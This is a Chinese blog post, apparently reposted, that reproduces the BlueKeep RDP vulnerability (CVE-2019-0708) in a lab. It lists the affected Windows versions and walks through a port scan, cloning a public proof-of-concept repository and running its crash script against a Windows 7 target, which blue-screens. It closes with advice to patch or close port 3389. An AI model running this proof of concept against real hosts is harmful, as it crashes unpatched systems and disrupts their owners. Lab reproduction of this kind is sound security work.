CVE-2019-0708漏洞复现

时间:2020-04-28 18:53:01   收藏:0   阅读:127

CVE-2019-0708漏洞复现

漏洞成因:

CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。

漏洞危害:

成功利用该漏洞可以在目标系统上执行任意代码,然后攻击者可以安装程序,查看、更改或删除数据,或创建具有完整用户权限的新帐户。

影响范围:

Windows 7 for 32-bit SP1

Windows 7 for x64-based SP1

Windows Server 2008 for 32-bit SP2

Windows Server 2008 for 32-bit SP2 (Server Core installation)

Windows Server 2008 for Itanium-Based SP2

Windows Server 2008 for x64-based SP2

Windows Server 2008 for x64-based SP2 (Server Core installation)

Windows Server 2008 R2 for Itanium-BasedSystems SP1

Windows Server 2008 R2 for x64-based SP1

Windows Server 2008 R2 for x64-based SP1 (Server Core installation)

Windows XP SP3 x86

Windows XP SP2 x64

Windows XP Embedded SP3 x86

Windows Server 2003 SP2 x86

Windows Server 2003 SP2 x64

实验环境:

攻击机:kali linux  192.168.48.129

靶机:windows 7  192.16848.56

Win7防火墙关闭,打开3389端口

漏洞复现:

l  端口扫描,看看3389端口是否打开

 技术分享图片

3389已打开

l  安装pip3,再安装impacket库

 技术分享图片

l  下载poc

git clone https://github.com/n1xbyte/CVE-2019-0708.git

 技术分享图片

l  cd到/CVE-2019-0708,然后进行攻击

python3 crashpoc.py 192.168.48.56 64(192.168.48.56:目标ip   64:操作系统类型)

 技术分享图片

l  攻击成功,win7蓝屏

 技术分享图片

虽然现阶段只是让目标机器蓝屏,但该漏洞的利用绝不会这么简单,及时为自己的主机打上对应的补丁,或者直接关闭3389端口可以有效地防止该攻击。

原文:https://www.cnblogs.com/wz3389/p/12796027.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!